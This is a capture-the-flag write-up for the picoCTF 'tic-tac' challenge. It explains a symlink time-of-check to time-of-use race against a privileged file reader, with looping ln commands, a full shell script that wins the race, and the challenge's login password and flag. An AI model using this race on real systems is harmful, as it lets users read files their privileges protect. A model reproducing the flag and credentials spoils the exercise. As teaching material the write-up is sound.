tic-tac
Challenge Info
Tags: Binary Exploitation, bash, linux, toctou
AUTHOR: JUNIAS BONOU
Points: 200
Description
Someone created a program to read text files; we think the program reads files with root privileges but apparently it only accepts to read files that are owned by the user running it. ssh to saturn.picoctf.net:51906, and run the binary named “txtreader” once connected.
Login as ctf-player with the password, fd7746b4
Solution
There is a binary, “txtreader”, that reads text files, but only files owned by the user running it; per the description it runs with higher privileges than that user. We need to read “flag.txt”, which is not owned by “ctf-player”, so a direct read is refused.
The “toctou” tag stands for time-of-check to time-of-use, a class of race condition: the program checks a resource first (here, who owns the file) and uses it afterwards (opens and reads it), and an attacker who can change what the path refers to in the window between those two steps gets the check performed on one file and the use performed on another. A symbolic link we control is the usual lever: point it at a file we own while the check runs, and at the flag while the read runs.
This article helped a lot in solving the challenge, I just followed the steps shown here with some modifications.
- Create a text file with any content in it (called NEWFILE below). It is owned by ctf-player, so the reader accepts it.
- Make a symbolic link to it:
ln -s NEWFILE flip
- Overwrite the symbolic link so it points at the flag (note that the article used -sF; on Linux GNU ln treats -F as --directory, so the flag to replace an existing link is -f):
ln -sf flag.txt flip
- Test the flipping rate. To win the race the link has to change between the ownership check and the read, so flip it many times and see how long that takes:
for i in {1..1000}; do ln -sf flag.txt flip; ln -sf NEWFILE flip; done
- Start constant flipping in the background:
while true; do ln -sf flag.txt flip; ln -sf NEWFILE flip; done &
This alternates the link between NEWFILE (which passes the check) and flag.txt (which is what we want read) as fast as the shell can, and keeps doing so in the background while txtreader flip is run repeatedly in the foreground; the article's version does the same with files named public and secret. Most runs will either be refused (the check saw flag.txt) or print NEWFILE (the read saw NEWFILE); the run where the check saw NEWFILE and the read saw flag.txt prints the flag.
In the article's case, flipping 30 times worked, but in my case I needed to flip it 200 times, and then I got the flag.
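The whole procedure as one script, added here as an example and not part of the original writeup or the challenge. It goes slightly beyond the commands above: the link is re-pointed by building a fresh link and renaming it over flip (rename(2) is atomic, so flip never disappears, whereas some ln -sf implementations unlink and recreate), and the reader is invoked in a loop until its output contains picoCTF{. Because txtreader is not available offline, the script also contains a constructed stand-in reader, fake_reader, that does a check, waits, then reads through the link, which is the same shape of window a stat()-then-open() sequence has. The function names (swap_link, start_flipper, win_race, fake_reader, demo), the file names public.txt and secret.txt, the sample flag, and the assumption that txtreader takes the file path as its only argument are all mine.

```shell
#!/bin/sh
# Added example (not the writeup's or the challenge's code): winning a symlink
# TOCTOU race against a "check owner, then open" file reader.
# Assumes GNU or busybox coreutils (readlink -f, fractional sleep) and that the
# reader takes the file path as its only argument ("txtreader flip").

# Re-point DIR/flip at TARGET atomically: create a fresh link under a temporary
# name and rename(2) it over flip. The targets are regular files, so mv
# replaces the link itself instead of moving into a directory.
swap_link() {   # swap_link DIR TARGET
    local tmp="$1/.flip.tmp.$$"
    ln -s "$2" "$tmp" && mv "$tmp" "$1/flip"
}

# Flip DIR/flip back and forth in the background between PUBLIC (a file we
# own, which passes the ownership check) and SECRET (the file we want read).
start_flipper() {   # start_flipper DIR PUBLIC SECRET ; sets FLIPPER_PID
    ( while :; do
          swap_link "$1" "$3" || :
          swap_link "$1" "$2" || :
      done ) >/dev/null 2>&1 &
    FLIPPER_PID=$!
}

stop_flipper() {
    kill "$FLIPPER_PID" 2>/dev/null || :
    wait "$FLIPPER_PID" 2>/dev/null || :
}

# Run READER on DIR/flip up to ATTEMPTS times. Print the first output that
# contains PATTERN (fixed string) and return 0; return 1 if the race is never
# won. Individual runs failing (check refused, wrong file read) is expected.
win_race() {   # win_race DIR PATTERN ATTEMPTS READER
    local i=0 out
    while [ "$i" -lt "$3" ]; do
        i=$((i + 1))
        out=$("$4" "$1/flip" 2>/dev/null) || :
        if printf '%s\n' "$out" | grep -qF -- "$2"; then
            printf '%s\n' "$out"
            return 0
        fi
    done
    return 1
}

# Constructed stand-in for txtreader so the script can be dry-run offline.
# The real binary compares the file's owner with the caller; this one refuses
# anything that resolves to secret.txt by name, then reads through the link a
# moment later. Only the second step follows the link a second time, and that
# is the window the flipper exploits.
fake_reader() {   # fake_reader PATH
    case "$(readlink -f "$1")" in
        */secret.txt) return 1 ;;
    esac
    sleep 0.01
    cat "$1"
}

# Offline dry run on constructed files. On the target the equivalent is:
#   start_flipper . NEWFILE flag.txt; win_race . 'picoCTF{' 1000 ./txtreader
demo() {
    local dir rc=1
    dir=$(mktemp -d)
    printf 'harmless text\n' > "$dir/public.txt"
    printf 'picoCTF{constructed_sample_flag}\n' > "$dir/secret.txt"   # constructed
    ln -s public.txt "$dir/flip"
    start_flipper "$dir" public.txt secret.txt
    if win_race "$dir" 'picoCTF{' 400 fake_reader; then rc=0; fi
    stop_flipper
    rm -rf "$dir" 2>/dev/null || :
    return "$rc"
}

demo
```

The per-attempt success rate is the product of two coin flips (check sees the public file, read sees the secret one), so the number of attempts needed varies from run to run, which is why the writeup's 200 and the article's 30 are both plausible. Widening the window from the attacker's side is not possible here, so the only lever is flipping fast and trying often.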
Flag
picoCTF{ToctoU_!s_3a5y_a5726c65}